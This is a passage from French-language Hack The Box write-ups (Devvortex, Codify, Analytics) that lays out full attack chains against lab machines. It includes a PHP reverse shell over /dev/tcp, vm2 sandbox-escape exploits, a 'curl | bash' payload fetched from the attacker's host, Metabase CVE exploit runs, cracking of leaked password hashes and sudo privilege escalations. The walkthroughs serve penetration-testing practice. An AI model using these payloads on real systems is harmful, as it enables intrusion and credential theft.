22 23 24 25 26 27 28 29 30 31 32 33 └─$ gobuster dir -u dev.devvortex.htb -t 50 -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) \u0026amp; Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://dev.devvortex.htb [+] Method: GET [+] Threads: 50 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== ... /administrator (Status: 301) [Size: 178] [--\u0026gt; http://dev.devvortex.htb/administrator/] /api (Status: 301) [Size: 178] [--\u0026gt; http://dev.devvortex.htb/api/] /cache (Status: 301) [Size: 178] [--\u0026gt; http://dev.devvortex.htb/cache/] /components (Status: 301) [Size: 178] [--\u0026gt; http://dev.devvortex.htb/components/] /home (Status: 200) [Size: 23221] /images (Status: 301) [Size: 178] [--\u0026gt; http://dev.devvortex.htb/images/] /includes (Status: 301) [Size: 178] [--\u0026gt; http://dev.devvortex.htb/includes/] /index.php (Status: 200) [Size: 23221] /language (Status: 301) [Size: 178] [--\u0026gt; http://dev.devvortex.htb/language/] /layouts (Status: 301) [Size: 178] [--\u0026gt; http://dev.devvortex.htb/layouts/] /libraries (Status: 301) [Size: 178] [--\u0026gt; http://dev.devvortex.htb/libraries/] /media (Status: 301) [Size: 178] [--\u0026gt; http://dev.devvortex.htb/media/] /modules (Status: 301) [Size: 178] [--\u0026gt; http://dev.devvortex.htb/modules/] /plugins (Status: 301) [Size: 178] [--\u0026gt; http://dev.devvortex.htb/plugins/] /robots.txt (Status: 200) [Size: 764] /templates (Status: 301) [Size: 178] [--\u0026gt; http://dev.devvortex.htb/templates/] /tmp (Status: 301) [Size: 178] [--\u0026gt; http://dev.devvortex.htb/tmp/] Administrator page Il y a une page /administrator avec un login/pass. On peut voir le nom de l\u0026rsquo;outil qui permet cette page de connexion, Joomla!.\nOn peut trouver la version de Joomla! ici : http://dev.devvortex.htb/administrator/manifests/files/joomla.xml Version: 4.2.6\nEn cherchant sur internet, on trouve rapidement une CVE sur cette version de Joomla ainsi qu\u0026rsquo;un repo github qui permet de l\u0026rsquo;exploiter\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 └─$ ruby exploit.rb http://dev.devvortex.htb:80 Users [649] lewis (lewis) - lewis@devvortex.htb - Super Users [650] logan paul (logan) - logan@devvortex.htb - Registered Site info Site name: Development Editor: tinymce Captcha: 0 Access: 1 Debug status: false Database info DB type: mysqli DB host: localhost DB user: lewis DB password: P4ntherg0t1n5r3c0n## DB name: joomla DB prefix: sd4fg_ DB encryption 0 On trouve donc les credentials suivant: user: lewis mot de passe: P4ntherg0t1n5r3c0n##\nEn essayant de se connecter sur la page de login ça fonctionne! on arrive ensuite sur un Dashboard.\nDashboard Il se trouve que ce dashboard utilise une template. La page de login également. Ce sont des modèles tout prêt, du code php déjà écrit qu\u0026rsquo;il faut juste importer. Il se trouve que depuis le dashboard, on peut modifier les templates qui sont utilisées pour le dashboard et pour la page de login. Notament le code php. On va donc pouvoir modifier le code php du dashboard par exemple pour exectuer une commande bash et créer un reverse shell pour obtenir un acces sur la machine.\nReverse shell On modifie le code php de la page d\u0026rsquo;administration pour créer un reverse shell 1 2 3 4 5 6 7 8 9 10 11 12 13 \u0026lt;?php exec(\u0026#39;/bin/bash -c \u0026#34;exec nohup bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.109/44446 0\u0026gt;\u0026amp;1 \u0026amp;\u0026#34;\u0026#39;); ... ?\u0026gt; ------------------------------------------------------------------------------- ~ » nc -lvp 44444 leopold@leopold-PC-FIXE Listening on 0.0.0.0 44444 Connection received on devvortex.htb 53842 bash: cannot set terminal process group (875): Inappropriate ioctl for device bash: no job control in this shell www-data@devvortex:~/dev.devvortex.htb/administrator$ whoami whoami www-data Stable shell On ouvre un shell plus stable en python\n1 2 3 4 python3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; export TERM=xterm ^Z stty raw -echo; fg lewis -\u0026gt; logan : user flag Avec le compte de lewis, on a pu accéder à la base de données du site web et récupérer les credentials de l\u0026rsquo;utilisateur logan.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 www-data@devvortex:~/dev.devvortex.htb/administrator$ mysql -u lewis -p mysql\u0026gt; show databases; +--------------------+ | Database | +--------------------+ | information_schema | | joomla | | performance_schema | +--------------------+ mysql\u0026gt; use joomla mysql\u0026gt; show tables; +-------------------------------+ | Tables_in_joomla | +-------------------------------+ ................................. ................................. | sd4fg_usergroups | | sd4fg_users | | sd4fg_viewlevels | ................................. 71 rows in set (0.00 sec) mysql\u0026gt; select * from sd4fg_users; ..................................... lewis@devvortex.htb | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u logan@devvortex.htb | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 ..................................... 2 rows in set (0.00 sec) hashcat - logan password (getting ssh access) On crack le hash avec rockyou, et on obtient les credentials pour logan: user: logan password : tequieromucho\n1 2 3 4 $ hashcat --help | grep 3200 3200 | bcrypt $2*$, Blowfish (Unix) | Operating System $ hashcat -m 3200 -a 0 -d 1 hash.txt /home/leopold/wordlists/rockyou.txt --show $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12:tequieromucho SSH to logan 1 2 3 4 $ ssh logan@localhost Password: tequieromucho logan@devvortex:~$ cat users.txt FLAG................ Privilege Escalation Enumeration 1 2 3 4 5 6 7 8 9 10 logan@devvortex:~$ sudo -l [sudo] password for logan: Sorry, try again. [sudo] password for logan: Matching Defaults entries for logan on devvortex: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin User logan may run the following commands on devvortex: (ALL : ALL) /usr/bin/apport-cli Exploit : apport-cli as root 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 logan@devvortex:~$ sudo /usr/bin/apport-cli --file-bug *** What kind of problem do you want to report? Choices: 1: Display (X.org) 2: External or internal storage devices (e. g. USB sticks) 3: Security related problems 4: Sound/audio related problems 5: dist-upgrade 6: installation 7: installer 8: release-upgrade 9: ubuntu-release-upgrader 10: Other problem C: Cancel Please choose (1/2/3/4/5/6/7/8/9/10/C): 1 *** Collecting problem information The collected information can be sent to the developers to improve the application. This might take a few minutes. *** What display problem do you observe? Choices: 1: I don\u0026#39;t know 2: Freezes or hangs during boot or usage 3: Crashes or restarts back to login screen 4: Resolution is incorrect 5: Shows screen corruption 6: Performance is worse than expected 7: Fonts are the wrong size 8: Other display-related problem C: Cancel Please choose (1/2/3/4/5/6/7/8/C): 2 *** To debug X freezes, please see https://wiki.ubuntu.com/X/Troubleshooting/Freeze Press any key to continue... ..dpkg-query: no packages found matching xorg ........... *** Send problem report to the developers? After the problem report has been sent, please fill out the form in the automatically opened web browser. What would you like to do? Your options are: S: Send report (1.4 KB) V: View report K: Keep report file for sending later or copying to somewhere else I: Cancel and ignore future crashes of this program version C: Cancel Please choose (S/V/K/I/C): V !/bin/bash root@devvortex:/home/logan# root@devvortex:/home/logan# cd root@devvortex:~# cat root.txt 8b49.....2438 ","date":"2024-03-23T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/devvortex-htb/","title":"HTB | Devvortex"},{"content":" Machine name OS IP Difficulty Codify Linux 10.10.11.239 Easy Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 Starting Nmap 7.80 ( https://nmap.org ) at 2023-12-31 01:27 CET Nmap scan report for 10.10.11.239 Host is up (0.016s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.52 |_http-server-header: Apache/2.4.52 (Ubuntu) |_http-title: Did not follow redirect to http://codify.htb/ 3000/tcp open http Node.js Express framework |_http-title: Codify Service Info: Host: codify.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.10 seconds /etc/hosts On ajoute les noms de domaines necessaire.\n1 2 ## ... 10.10.11.239 dirb, gobuster, dirsearch L\u0026rsquo;endpoint editor semble permettre d\u0026rsquo;executer du javscript et d\u0026rsquo;afficher le resultat.\n1 2 3 4 5 6 7 8 9 10 ┌──(kali㉿kali)-[~/github/dirsearch] └─$ dirbuster Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true Starting OWASP DirBuster 1.0-RC1 Starting dir/file list based brute forcing Dir found: / - 200 File found: /about - 200 File found: /editor - 200 File found: /limitations - 200 Dir found: /about/ - 200 Foothold Editor : node js sandbox Il y a un \u0026ldquo;editor\u0026rdquo;. C\u0026rsquo;est une sandbox node js, qui permet donc a n\u0026rsquo;importe qui d\u0026rsquo;executer du code node js depuis navigateur en accédant a leur site internet et d\u0026rsquo;obtenir le resultat a l\u0026rsquo;écran. Ils interdisent bien sûr les modules tels que child_process qui permettent d\u0026rsquo;executer du code arbitraire sur la machine.\nCependant, sur la page /about il est précise que l\u0026rsquo;éditeur de code fonctionne grâce à la vm2 library 3.9.16 accompagné d\u0026rsquo;un lien github. En tapant sur internet, on trouve tout de suite une vulnérabilité qui permet d\u0026rsquo;important quand meme child_process et donc de pouvoir executer du code arbitraire.\nVoici un PoC(Proof of concept):\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 const {VM} = require(\u0026#34;vm2\u0026#34;); const vm = new VM(); const code = ` aVM2_INTERNAL_TMPNAME = {}; function stack() { new Error().stack; stack(); } try { stack(); } catch (a$tmpname) { a$tmpname.constructor.constructor(\u0026#39;return process\u0026#39;)().mainModule.require(\u0026#39;child_process\u0026#39;).execSync(\u0026#39;whoami\u0026#39;); } ` console.log(vm.run(code)); PoC 2:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 const {VM} = require(\u0026#34;vm2\u0026#34;); const vm = new VM(); const code = ` err = {}; const handler = { getPrototypeOf(target) { (function stack() { new Error().stack; stack(); })(); } }; const proxiedErr = new Proxy(err, handler); try { throw proxiedErr; } catch ({constructor: c}) { c.constructor(\u0026#39;return process\u0026#39;)().mainModule.require(\u0026#39;child_process\u0026#39;).execSync(\u0026#39;touch pwned\u0026#39;); } ` console.log(vm.run(code)); Ce code permet donc d\u0026rsquo;executer la commande whoami et d\u0026rsquo;afficher le resultat. On observer d\u0026rsquo;ailleurs que l\u0026rsquo;utilisateur qui execute les commandes node js est svc\nExploit : vm2 library 3.9.16 Voici un code pour créer un reverse shell sur la target. Il est stocké dans un fichier index.html.\n1 2 3 ##!/bin/bash bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.125/44445 0\u0026gt;\u0026amp;1 On ouvre un server http sur le port 80. Cela va permettre d\u0026rsquo;effectuer un curl depuis la target pour récupérer le code de index.html.\n1 2 3 ~/github/Hacking/HackTheBox/Machines/Codify (main*) » sudo python3 -m http.server 80 1 ↵ Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.11.239 - - [31/Dec/2023 15:33:13] \u0026#34;GET / HTTP/1.1\u0026#34; 200 - Voici le code pour récupérer le code du reverse shell et l\u0026rsquo;executer : curl 10.10.14.125:80 | bash\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 const {VM} = require(\u0026#34;vm2\u0026#34;); const vm = new VM(); const code = ` err = {}; const handler = { getPrototypeOf(target) { (function stack() { new Error().stack; stack(); })(); } }; const proxiedErr = new Proxy(err, handler); try { throw proxiedErr; } catch ({constructor: c}) { c.constructor(\u0026#39;return process\u0026#39;)().mainModule.require(\u0026#39;child_process\u0026#39;).execSync(\u0026#39;curl 10.10.14.125:80 | bash\u0026#39;); } ` console.log(vm.run(code)); On est bien connecté !\n1 2 3 4 5 6 7 8 ~ » nc -lvp 44445 Listening on 0.0.0.0 44445 Connection received on codify.htb 60340 bash: cannot set terminal process group (1254): Inappropriate ioctl for device bash: no job control in this shell svc@codify:~$ ls ls pwned Stable shell On ouvre un shell plus stable en python\n1 2 3 4 5 6 7 8 9 10 svc@codify:~$ python3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; python3 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; svc@codify:~$ export TERM=xterm export TERM=xterm svc@codify:~$ ^Z [1] + 23986 suspended nc -lvp 44445 ~ » stty raw -echo; fg [1] + 23986 continued nc -lvp 44445 svc@codify:~$ joshua En regardant dans /home, on trouve l\u0026rsquo;utilisateur joshua. On va essayer de trouver son mot de passe pour avoir un accès à un compte utilisateur sur la machine cible.\njoshua password : tickets.db 1 2 3 4 svc@codify:~$ curl 10.10.14.125:80/linpeas.sh \u0026gt; linpeas.sh % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 828k 100 828k 0 0 5875k 0 --:--:-- --:--:-- --:--:-- 5914k 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 ## On met le resultat de linpeas dans un fichier $ ./linpeas.sh \u0026gt; linpeas_result.txt \u0026amp; ## On fait un grep pour voir les fichiers .db $ cat linpeas_result.txt | grep \u0026#34;.db\u0026#34; Found /var/lib/plocate/plocate.db: regular file, no read permission Found /var/www/contact/tickets.db: SQLite 3.x database, last written using SQLite version 3037002, file counter 17, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 17 -\u0026gt; Extracting tables from /var/lib/command-not-found/commands.db (limit 20) -\u0026gt; Extracting tables from /var/lib/fwupd/pending.db (limit 20) -\u0026gt; Extracting tables from /var/lib/PackageKit/transactions.db (limit 20) -\u0026gt; Extracting tables from /var/www/contact/tickets.db (limit 20) ## On remarque le fichier tickets.db qui semble intéressant svc@codify:~$ cat /var/www/contact/tickets.db �T5��T�format 3@ .WJ otableticketsticketsCREATE TABLE tickets (id INTEGER PRIMARY KEY AUTOINCREMENT, name TEXT, topic TEXT, description TEXT, status TEXT)P++Ytablesqlite_sequencesqlite_sequenceCREATE TABLE sqlite_sequence(name,seq)��\ttableusersusersCREATE TABLE users ( id INTEGER PRIMARY KEY AUTOINCREMENT, username TEXT UNIQUE, password TEXT ��G�joshua$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2 �� ����ua users ickets r]r�h%%�Joe WilliamsLocal setup?I use this site lot of the time. Is it possible to set this up locally? Like instead of coming to this site, can I download this and set it up in my own computer? A feature like that would be nice.open� ;�wTom HanksNeed networking modulesI think it would be better if you can implement a way to handle network-based stuff. Would help me out a lot. Thanks!opensvc@codify:~$ 2024-01-10 17:23:17 TLS Error: local/remote TLS keys are out of sync: [AF_INET]23.106.35.214:1337 [7] Dans ce fichier il y a le hash de l\u0026rsquo;utilisateur joshua\n1 joshua$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2 Second way to find tickets.db A l\u0026rsquo;aide de grep, on peut rechercher tous les fichiers qui contiennent une certaine chaine de caractères. On aurait pu par exemple, faire une recherche récursive de \u0026ldquo;joshua\u0026rdquo; dans tous les fichiers du système cible. On aurait alors trouver facilement le fichier tickets.db.\n1 2 3 4 5 6 7 8 9 10 11 svc@codify:~$ grep -rl \u0026#34;joshua\u0026#34; / 2\u0026gt; /dev/null /run/systemd/transient/session-c1.scope /run/systemd/users/1000 /run/systemd/sessions/c1 /var/cache/apt/srcpkgcache.bin /var/cache/apt/pkgcache.bin /var/www/contact/tickets.db # ICI /var/lib/apt/lists/lk.archive.ubuntu.com_ubuntu_dists_jammy_universe_binary-amd64_Packages /var/lib/apt/lists/lk.archive.ubuntu.com_ubuntu_dists_jammy_universe_i18n_Translation-en /var/log/wtmp /var/log/journal/08b7d40fcb5444a9baa8b47d27502d2d/user-1001.journal Cracking joshua hash | john A l\u0026rsquo;aide de john, on tente de cracker le hash du mot de passe de joshua\n1 2 3 4 5 6 7 8 9 10 11 $ john --wordlist=~/wordlists/rockyou.txt joshua_hash.txt Loaded 1 password hash (bcrypt [Blowfish 32/64 X2]) Will run 8 OpenMP threads Press \u0026#39;q\u0026#39; or Ctrl-C to abort, almost any other key for status spongebob1 (?) 1g 0:00:00:38 100% 0.02606g/s 36.27p/s 36.27c/s 36.27C/s teacher..atlanta Use the \u0026#34;--show\u0026#34; option to display all of the cracked passwords reliably Session completed Le mot de passe de l\u0026rsquo;utilisateur joshua est donc spongebob1.\nUser flag: SSH joshua 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 $ ssh joshua@10.10.11.239 The authenticity of host \u0026#39;10.10.11.239 (10.10.11.239)\u0026#39; can\u0026#39;t be established. ED25519 key fingerprint is SHA256:Q8HdGZ3q/X62r8EukPF0ARSaCd+8gEhEJ10xotOsBBE. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added \u0026#39;10.10.11.239\u0026#39; (ED25519) to the list of known hosts. joshua@10.10.11.239\u0026#39;s password: ******* Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64) ... Last login: Wed Jan 10 16:35:11 2024 from 10.10.14.159 joshua@codify:~$ whoami joshua joshua@codify:~$ ls user.txt joshua@codify:~$ cat user.txt 3c02.....ef98 Privilege Escalation mysql-backup.sh as root 1 2 3 4 5 6 joshua@codify:~$ sudo -l Matching Defaults entries for joshua on codify: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin, use_pty User joshua may run the following commands on codify: (root) /opt/scripts/mysql-backup.sh On remarque qu\u0026rsquo;on a le droit d\u0026rsquo;executer la commande /opt/scripts/mysql-backup.sh en tant que root.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 $ cat /opt/scripts/mysql-backup.sh ##!/bin/bash DB_USER=\u0026#34;root\u0026#34; DB_PASS=$(/usr/bin/cat /root/.creds) BACKUP_DIR=\u0026#34;/var/backups/mysql\u0026#34; read -s -p \u0026#34;Enter MySQL password for $DB_USER: \u0026#34; USER_PASS /usr/bin/echo if [[ $DB_PASS == $USER_PASS ]]; then /usr/bin/echo \u0026#34;Password confirmed!\u0026#34; else /usr/bin/echo \u0026#34;Password confirmation failed!\u0026#34; exit 1 fi /usr/bin/mkdir -p \u0026#34;$BACKUP_DIR\u0026#34; databases=$(/usr/bin/mysql -u \u0026#34;$DB_USER\u0026#34; -h 0.0.0.0 -P 3306 -p\u0026#34;$DB_PASS\u0026#34; -e \u0026#34;SHOW DATABASES;\u0026#34; | /usr/bin/grep -Ev \u0026#34;(Database|information_schema|performance_schema)\u0026#34;) for db in $databases; do /usr/bin/echo \u0026#34;Backing up database: $db\u0026#34; /usr/bin/mysqldump --force -u \u0026#34;$DB_USER\u0026#34; -h 0.0.0.0 -P 3306 -p\u0026#34;$DB_PASS\u0026#34; \u0026#34;$db\u0026#34; | /usr/bin/gzip \u0026gt; \u0026#34;$BACKUP_DIR/$db.sql.gz\u0026#34; done /usr/bin/echo \u0026#34;All databases backed up successfully!\u0026#34; /usr/bin/echo \u0026#34;Changing the permissions\u0026#34; /usr/bin/chown root:sys-adm \u0026#34;$BACKUP_DIR\u0026#34; /usr/bin/chmod 774 -R \u0026#34;$BACKUP_DIR\u0026#34; /usr/bin/echo \u0026#39;Done!\u0026#39; On remarque un problème dans le if. Il n\u0026rsquo;y a pas de guillement sur les variables. Ca va nous permettre de bruteforce le mot de passe car les wildcard seront executé\n1 2 3 4 5 6 if [[ $DB_PASS == $USER_PASS ]]; then /usr/bin/echo \u0026#34;Password confirmed!\u0026#34; else /usr/bin/echo \u0026#34;Password confirmation failed!\u0026#34; exit 1 fi 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 import subprocess def execute_command(command, password): command = f\u0026#39;echo \u0026#34;{password}*\u0026#34; | {command}\u0026#39; result = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True) return result.stdout.strip() def brute_force_password(): command = \u0026#34;/opt/scripts/mysql-backup.sh\u0026#34; charset = \u0026#39;abcdefghijklmnopqrstuvwxyz123456789\u0026#39; password_length = 21 password = \u0026#34;\u0026#34; for i in range(password_length): for c in charset: p = password + c output = execute_command(command, p) if \u0026#34;Password confirmed!\u0026#34; in output: print(f\u0026#34;Letter found: {p}\u0026#34;) password += c break if __name__ == \u0026#34;__main__\u0026#34;: brute_force_password() 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 bruteforce.py user.txt joshua@codify:~$ python3 bruteforce.py Letter found: k Letter found: kl Letter found: klj Letter found: kljh Letter found: kljh1 Letter found: kljh12 Letter found: kljh12k Letter found: kljh12k3 Letter found: kljh12k3j Letter found: kljh12k3jh Letter found: kljh12k3jha Letter found: kljh12k3jhas Letter found: kljh12k3jhask Letter found: kljh12k3jhaskj Letter found: kljh12k3jhaskjh Letter found: kljh12k3jhaskjh1 Letter found: kljh12k3jhaskjh12 Letter found: kljh12k3jhaskjh12k Letter found: kljh12k3jhaskjh12kj Letter found: kljh12k3jhaskjh12kjh Letter found: kljh12k3jhaskjh12kjh3 1 2 3 4 5 joshua@codify:~$ su root Password: root@codify:/home/joshua# cd root@codify:~# cat root.txt 4029.....7333 ","date":"2024-01-10T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/codify-htb/","title":"HTB | Codify"},{"content":" Machine name OS IP Difficulty Analytics Linux 10.10.11.233 Easy Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 ┌──(kali㉿kali)-[~] └─$ nmap -sC -sV -An -p- 10.10.11.233 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA) |_ 256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://analytical.htb/ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Foothold /etc/hosts On ajoute les noms de domaines necessaire. Un peu plus tard on découvrira qu\u0026rsquo;il y a également le nom de domaine: data.analytical.htb\n1 2 3 ## ... 10.10.11.233 analytical.htb 10.10.11.233 data.analytical.htb Metabase CVE La machine semble utiliser metabase. En recherchant sur internet: metabase CVE.\nOn trouve tout de suite une vulnérabilité de 2023 exploitable assez facilemement pour la version de metabase installée.\nJ\u0026rsquo;ai cloné un repo github avec la Proof of concert (PoC) ainsi qu\u0026rsquo;un autre script pour exploiter la vulnérabilité et ouvrir un shell.\n1 2 3 4 5 6 ┌──(kali㉿kali)-[~/…/HackTheBox/Machines/Analytics/CVE-2023-38646] └─$ python3 CVE-2023-38646-POC.py --ip data.analytical.htb Failed to connect using HTTPS for data.analytical.htb. Trying next protocol... None. Vulnerable Metabase Instance:- IP: data.analytical.htb Setup Token: 249fa03d-fd94-4d5b-b94f-b4ebf3df681f D\u0026rsquo;après la CVE, si un setup Token est présent sur la page /api/session/properties, alors la machine est vulnérable.\nMetabase Exploit - Reverse Shell Grâce aux deuxième script, on a réussi à ouvrir shell :\n1 2 3 4 5 6 7 8 9 ┌──(kali㉿kali)-[~/…/HackTheBox/Machines/Analytics/CVE-2023-38646] └─$ python3 CVE-2023-38646-Reverse-Shell.py --rhost data.analytical.htb --lhost 10.10.14.125 --lport 44444 [DEBUG] Original rhost: data.analytical.htb [DEBUG] Preprocessed rhost: http://data.analytical.htb [DEBUG] Input Arguments - rhost: http://data.analytical.htb, lhost: 10.10.14.125, lport: 44444 [DEBUG] Fetching setup token from http://data.analytical.htb/api/session/properties... [DEBUG] Setup Token: 249fa03d-fd94-4d5b-b94f-b4ebf3df681f [DEBUG] Version: v0.46.6 ... Sur la kali, on a un deuxième terminal avec un nc ouvert :\n1 2 3 4 5 6 7 8 9 ┌──(kali㉿kali)-[~/github/dirsearch] └─$ nc -lvp 44444 listening on [any] 44444 ... connect to [10.10.14.125] from analytical.htb [10.10.11.233] 53506 bash: cannot set terminal process group (1): Not a tty bash: no job control in this shell d7bb30f10313:/$ whoami whoami metabase Enumeration (linPEAS) Pour faire un recherche plus poussé sur la machine avec le compte accessible, on va utilisé l\u0026rsquo;outil linPEAS:\n1 2 3 4 5 6 7 8 # KALI: On télécharge linPEAS.sh depuis la page \u0026#34;releases\u0026#34; du dépôt github curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh \u0026gt; linpeas.sh # KALI: On ouvre le port 80 à l\u0026#39;aide de python sur la machine hôte sudo python3 -m http.server 80 # CIBLE: On récupère linPEAS.sh depuis la machine cible en se connectant sur le port 80 avec wget wget 10.10.14.125:80/linPEAS.sh Après l\u0026rsquo;execution de linPEAS, on a pu trouver un utilisateur et un mot de passe:\n1 2 3 4 5 # $ env ... META_USER=metalytics META_PASS=An4lytics_ds20223# ... SSH as metalytics On peut désormais se connecter en ssh avec le compte utilisateur trouvé:\n1 2 3 4 5 6 7 8 9 ┌──(kali㉿kali)-[~/Hacking/HackTheBox/Machines/Analytics] └─$ ssh metalytics@10.10.11.233 metalytics@10.10.11.233\u0026#39;s password: Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 6.2.0-25-generic x86_64) ... ... Last login: Sat Dec 30 17:28:13 2023 from 10.10.14.99 metalytics@analytics:~$ cat user.txt 8102.....9b97 Privilege Escalation GameOverlay Exploit : CVE-2023–32629 On a executé a nouveau un linPEAS sur la machine sans grand succès. Cependant, on a trouvé la version qui tourne sur la machine: Ubuntu 22.04.3.\nAprès quelques recherches sur internet on a trouvé une faille exploitable dans cette version d\u0026rsquo;ubuntu expliqué ici : https://medium.com/@0xrave/ubuntu-gameover-lay-local-privilege-escalation-cve-2023-32629-and-cve-2023-2640-7830f9ef204a\nIl s\u0026rsquo;agit de la CVE-2023–32629. Il y a 3 commandes a écrire sur la machine pour vérifier si elle est vulnérable:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 metalytics@analytics:~$ lsmod | grep overlay overlay 188416 1 metalytics@analytics:~$ modinfo overlay filename: /lib/modules/6.2.0-25-generic/kernel/fs/overlayfs/overlay.ko alias: fs-overlay license: GPL description: Overlay filesystem author: Miklos Szeredi \u0026lt;miklos@szeredi.hu\u0026gt; srcversion: 851BCABACE90D7C44199412 depends: retpoline: Y intree: Y name: overlay vermagic: 6.2.0-25-generic SMP preempt mod_unload modversions sig_id: PKCS#7 signer: Build time autogenerated kernel key sig_key: 03:91:76:66:F0:D5:23:99:A0:4F:17:5E:BD:A8:42:D6:08:A9:5F:71 sig_hashalgo: sha512 signature: 1E:49:B1:C3:CA:D2:84:15:17:4E:A5:AE:D6:E5:12:FD:D8:88:E3:C2: 7B:55:50:11:FB:96:54:0C:E5:E7:39:D8:0A:3A:5A:1B:E2:9B:4D:63: 70:8D:66:E1:72:15:90:BC:33:F2:7D:FA:B6:77:22:F1:7E:54:67:C8: 9F:13:B4:87:0D:3B:DE:97:BC:06:1A:83:2C:BF:41:23:B5:73:D1:09: E6:A8:FE:BD:A3:8C:7D:4C:C9:B6:30:91:24:64:BB:0E:93:7D:99:44: 2C:22:50:C8:75:9F:CC:67:54:65:AC:1C:CF:D5:87:A9:EC:71:9E:BF: C5:9E:C0:22:0E:2B:4F:9E:C9:69:B9:37:BA:B2:4F:7A:F2:A2:76:9C: D8:D6:7F:D0:8D:E8:64:D8:40:29:C1:E3:2C:9B:60:B9:35:A6:DA:E2: 4D:75:90:42:84:98:AE:2B:D4:3A:13:50:94:AD:72:72:B8:35:50:F4: 64:3C:23:BA:70:EC:D3:EE:05:03:0B:1E:61:01:42:65:2C:5D:44:75: CF:E1:62:47:41:02:7A:27:28:EB:F7:D9:02:AB:15:EB:1C:42:54:62: F0:2E:B0:FF:7D:AC:A0:FF:30:8F:24:E2:AD:43:7C:81:B8:F5:FB:25: D2:5A:71:53:45:99:BF:26:0E:40:D6:DD:3E:37:09:D8:7C:2E:9F:29: 33:86:CA:53:45:F2:3A:B8:E5:0B:D4:32:38:49:FB:C0:6B:06:19:83: 6F:FA:05:9D:6C:97:CB:0F:C4:10:EB:A3:76:53:B6:97:CC:EC:86:96: 01:8F:AB:EB:31:F2:CA:0B:0E:D0:E3:03:6B:3B:30:0B:83:07:74:04: 96:B7:E6:A2:B7:1D:7A:40:30:FC:F3:B0:E8:A4:F6:2F:5C:7F:F3:28: 9F:A6:9E:F1:40:ED:F1:21:0E:2E:0A:F0:AC:1D:96:28:8D:C0:A2:56: F6:F1:60:F9:2A:36:8C:0C:18:BE:C3:B5:C4:60:3A:53:66:F0:3B:BC: 